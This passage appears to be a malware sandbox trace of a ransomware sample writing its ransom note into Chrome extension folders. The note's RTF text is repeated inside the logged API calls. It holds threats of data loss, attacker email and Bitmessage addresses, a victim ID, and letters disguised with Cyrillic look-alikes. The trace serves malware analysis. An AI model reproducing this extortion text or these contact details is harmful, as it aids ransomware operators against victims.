\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0286.560] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.561] CloseHandle (hObject=0x2f0) returned 1 [0286.561] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\#readme_eman#.rtf")) returned 0xffffffff [0286.561] GetLastError () returned 0x2 [0286.561] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.562] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.562] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 